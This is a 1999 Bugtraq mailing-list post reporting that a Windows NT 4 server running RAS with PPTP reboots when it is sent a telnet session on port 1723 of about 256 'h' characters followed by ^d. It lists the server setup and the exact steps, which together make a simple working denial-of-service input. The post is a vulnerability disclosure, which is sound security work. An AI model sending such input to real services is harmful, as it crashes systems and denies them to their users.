[10363] in bugtraq
RE Possible DOS in WinNT RAS (PPTP)
daemon@ATHENA.MIT.EDU (Simon Helson)
Tue Apr 27 13:15:45 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <4.2.0.32.19990427204432.00a15a90@203.97.185.82>
Date: Tue, 27 Apr 1999 20:55:50 -0700
Reply-To: Simon Helson <simon@CONCEPTS.CO.NZ>
From: Simon Helson <simon@CONCEPTS.CO.NZ>
To: BUGTRAQ@NETSPACE.ORG
Hello again.
please excuse the lack of detail in my first posting. I was trying to
recollect the events of the past evening.
Unfortunately I don't have unlimited access to a NT server to play with.
However, I have tried this again (on the same server) this time over the
internet as opposed to a LAN. (trying to remove the NIC from the equation.)
Firstly, the NT setup:
NT Server Version 4, with Service Pack 4.0 applied.
(outside US version - only 40 bit)
PPTP added as a network device
Number of VPNs available - 2
then RAS service started.
The attack box setup:
RedHat Linux 5.2 running kernel 2.2.1
modem connection to the net
The procedure I followed:
[root@blobby /root]# telnet <removed for privacy> 1723
Trying <removed for privacy>...
Connected to <removed for privacy>.
Escape character is '^]'
hhhhhhhhhhhhhhh<type 256 times>
^d (not shown in output)
^]
telnet> close
Connection closed.
The instant I hit ^d his server rebooted. AFAIK there is nothing special in
the setup of the NT server.
I hope this clears up the picture.
Cheers
Simon
